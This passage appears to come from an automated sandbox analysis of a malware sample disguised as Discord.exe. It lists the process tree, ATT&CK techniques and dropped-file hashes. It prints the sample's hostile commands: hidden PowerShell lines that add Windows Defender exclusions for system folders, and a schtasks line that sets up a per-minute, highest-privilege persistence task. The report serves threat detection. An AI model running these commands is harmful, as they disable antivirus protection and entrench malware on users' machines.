- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Users\Public\Downloads\Discord.exe"C:\Users\Public\Downloads\Discord.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"7⤵
- Scheduled Task/Job: Scheduled Task
PID:3720
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1468
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4324
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5713ad359b75fe6d947468ec1825202b9
SHA119dcd19f18a2ad6deb581451aad724bd44a592a4
SHA25656572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4
SHA5124df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8
-
Filesize
152B
MD5c58ccb4da696442ae40d3db9e4b41c3f
SHA1e27933a94d57f04c75b8bff25ad7012171917f87
SHA256d0d75be801bf0c5f715665c73214bfa38fd714dd9ee846de410855d96dd75931
SHA51282a7cd39758d67f1d177ce7f46a5ee560eb60207ca7ca1e39b9a08a269ed140532bf1ec85899a033a54d20a0d59592d1cd5f5d35f71da98f6b6e35cd904e1872
-
Filesize
152B
MD5ef0e81b130f8dcf42e80097a75e5d04d
SHA1d8694b7c5fba1ee2e73e69dd7790ca5b1cb882db
SHA256fc53158d948d1742e3f960124f9fdb138eaa4aa711d0f43833fa893247de4918
SHA512c85df1696537dfce601de46183b1b22d7f0007b0f695f1904bbd1a6e429d7787c3d6199bcecdb21936d811b35eeca57a9800bcd3a3b585569aabeb0b5b497efd
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
4KB
MD55e5597301c202c1e7043c67bc6587d35
SHA159418abe77f730ca3bec9bbefdf50446dbb1ae96
SHA25668b0534afba394a923747aa6a7947e9368557328e4bce88916ed8c0496bd1d21
SHA5126faef228510f282d3f17c59184f57d6990451769410f630ebbd944077fa278136485847e759676c5725a93ae68d0346515e3cf651d5a2300937bc7c8d2acf07d
-
Filesize
5KB
MD53a6b61be7b504f0360b8e818ff41c6e9
SHA149d6a581032a90f657b25a4e61a4f2022db4d95d
SHA256a1f00d4c7abbf61b54847c2596849b7b39dfbe5e6358f8a5fbfa25872267c8fa
SHA512ea07b2361eb261e8fe3ec0c3a07923846a65645d89cb6f4989e6417925078cfced6d5025ef1dc1a8b8861ede3e93692f1fe0e979167f1f5cbce1ec3f9baa7e5b
-
Filesize
24KB
MD562aee047a3c6cf2fec2a29a34157633b
SHA151b6eed704d65a62d8793ea18885d12aa39a5cf2
SHA256342e67b65a4070bbd6e7c2fbf75c98e727d9db45fa071181cae0f5eade726ddf
SHA51221ee4907a0dcf077f9233542462b8bfd01d976dc1fe4a7b7c4ad70d691e7b9101bddcc292e13fc83a22f56355aa5b93949ac124c84da1f43a80851bf313d895e
-
Filesize
24KB
MD5a18e33a424007376b810134dde07fec6
SHA13acbb4070e7fab6fea0f6c618aeca0964e39f7f8
SHA25612852fe3bc04c3a3f6cdb76d7fa37cf0d7f91ffe801c70caf5ee4f5bb34e2821
SHA5123a08afee6762546ba967965d72b90a0e0ed2a45bee0e195696c92f511c4b92634acdb669e6320359cb436e809c9672c0371042990aaf26b90da06da523ce6b9b
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
8KB
MD58fd705468cef9bb7ce97ba5497c8bd68
SHA1c47c53ea47bde51b41f9f4a2485de480e0925fb4
SHA25671cf978fcc06acf2e68292ab34989227ef2a34a6cf9c80a458db73e6de79a695
SHA51298f9d31a2d5fca361087cbc17cebb93fcc837f46ab24bff22a31b3bf5adff79c71eace5bc03d5a3accc5bb9b57744917fa9cc90c9082cb19759f653d26126319
-
Filesize
1KB
MD55e22dd1cda88782a1f52f76e748ef957
SHA13231826619a06fa541e2bfb21da445bd7013b5ac
SHA25673302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec
SHA51275039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498
-
Filesize
1KB
MD559dd010f331bcc981f419d86a2a0d658
SHA167a0eada7f9155eb45e24703ae293fdd8665eb6f
SHA2561507b7130e3ea535b54a34c4a523b5be6a54016ccff9868d7834729f343f3684
SHA5125488fc9e84a9ee02ed5c66409f9cb5439b9be43d1acb9589996f083a26ee149a2059329fd7c9a1b54a00a70e17c82db29190ed775fccd1a47ab53ac396ab216e
-
Filesize
1KB
MD508b59cf8e2e3a929ea95184bf5aa591a
SHA14f515ff72e582be6122d1642996c1e575c515e2b
SHA256dc31980e5e8823ff48fd4c1e8fec022358d874c21d3ba766c64fae24ad3aeeeb
SHA512c1af66be8dfaaf2ab50487e77438f9d78bca794fd3e2378cd4f4fb67b4038a02f606b9e8258c29cf0988400b72b903bf3d403b0b6c47c2bc87f4702d644eab71
-
Filesize
1KB
MD585ce54ce614b625332ea3ccac4e0857f
SHA1dc8e80dd46b9cd6dd39bff3e281090f952973884
SHA2566814b74f3f95da7aa1de9f6e629aa3d908e3d1603f0a724bb3ae7ae381834e9c
SHA512a67866176a3123dcb2cd5b1013901a0a2abea37c375f6d62a508977ecb8da1b89645395b4955b318cbcbcc3db9d12f754a3795918c519c3ffbba7748dee5a01b
-
Filesize
1KB
MD547d1715b78ee034489d6c8cfae820c5c
SHA1f5a035dc4da2185d5160a1a7d045560e54b9a92d
SHA25634f8a18234f994cbff36e71e372f68ba9ef7acd50c6182fc78a8d8180b279e0e
SHA5128774213d536d7fbaff6288e17b908a6ad480c029a759918bf5d3278a8a6de9092458035a0ea97c04c675af5a28048945cecc7fc4180ef32671f952d6e3a04868
-
Filesize
1KB
MD5b4b0efd35f253415b307a084476fa6da
SHA1ecef2b25629ce59786db0ae06aadd3872b766624
SHA25608988005841640b507c0e68b13d46e8afe5e245357864d856ea38f1e36a91c62
SHA512db75d8927b9ece573cb648c1bb0c7726cf981a8a95890c609aa07b857c17be8689a93d37771a93ed1c6b1a1b2299ee2b8881f875ed36d247e38e69401fce373b
-
Filesize
1KB
MD5e80e1a70b5afa334887f4c314a5bde3d
SHA17c6b1c3d89ba48c2f33e5c47d173a78f128757a3
SHA256c4d1731477e105b3053816b0ca34080573a069a07a30151d5206d23b57be2e90
SHA5126661ced013967a85e22fe73aba3970db52a5ae7bd5cd00c67ceaf494dd3963db0beb9d9e466bbd81c04faca7b99038660c19288cb2dae8ad406bdcbbc0da4a65
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
1KB
MD5860b6a25e4b29f37d34502a3a1a41ab9
SHA1bd6a3df843c83d1654ad99f749ea53fd3c0498b7
SHA256e4e6c182d7f03de2859fd8f1dca9bdafc129aff10aea0fdab2838987366f1a7c
SHA5125582b8b44ae8c258731185f2a18d21d5796c6d9830b4d508a6504a0fc0a21914650a87876276fc3fe301bf1fb238b57d7d8e1134f93c124883ba54c779786548
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD50f7e70a17cdf82cc23d54206602f97ff
SHA1c53eeea87835e3c6e4e650df1080bd71818b68e7
SHA25689474e0b7ae5ea07af471bfb5ce6cc4411c0ab64162ac1c05857e1162b6b6f0e
SHA5126afd8a5cdea4fdb6058f6a614cc8ad33620e044bc3292043e87dc0167c7d8040b541635ebd1f973a705d3f57af5d05c1de7bb27bdc3b30532bc1be21d60c362c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD5c1c6a003c72da8de72f172b3ff2ce987
SHA1cd66dad283774fd8b9f704c4aeaa421987726818
SHA2563e5fe2550d717957b2761c8c0fa9d47ca3dfceafab9830c34e75a8c089ef1a78
SHA512890934a46b2f58d91dfd3d785ac91c826bb1a6d5cf561b56bfa33fb768e91b864f75055d62fbfa0d5d0e089411d5e6e2a77e30547679c5f6ec3303ae5be1d8ca
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD5e57f9c70b9e669921c4389f4779c57bd
SHA1bf40f4cdfb1d14e4de93b32cedbd5b21114564a9
SHA2561c9ce8d0a8b0cf6e00f5c96add109a906e130c0bc54c0bd9ed5ea5dd9ea17b8f
SHA512b98483291e6be4ccfcfb35d6d7a81e574e381bae43cb058a132579d491acf9eb5626960fcfceb2ec6b5a74ca473b5ea5700878e8ebddd8e99fc9efea401c0059
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD50ea105ee2980fc116f475d0ace825f4e
SHA1980747a2eb025e37de3e605afa8a56883aacc7ac
SHA2562ea54cc6c4ff6b86369b84c46a7b3ea95f65b28408ef889ead9094e8776090d5
SHA5123cfd2eb59aec5610def96685e843c6d03cad97e1b166b781d452ff1e935f027c7c8131296d82ef2e5bf742ca127832bf0067ab976c0a083dcc2d9f9af5ce3e18
-
Filesize
66KB
MD5879e4ad359e88bc384ee197e68728b50
SHA1f7547bfe974d52fe71c5e8f5e8195732f1736509
SHA2560cfc81ec769e4cb977cd2fadc68a766a2a80f80691c0b8f8517f468b8cf4fdfe
SHA51223cc1aa66bf4158310258bcfa806c89085ec43a0f476d4e46d6da8c4f91a38b8b653a7a50c736592894d29301f95ef76866c3d920f1aeb2d51248bbeaa144e97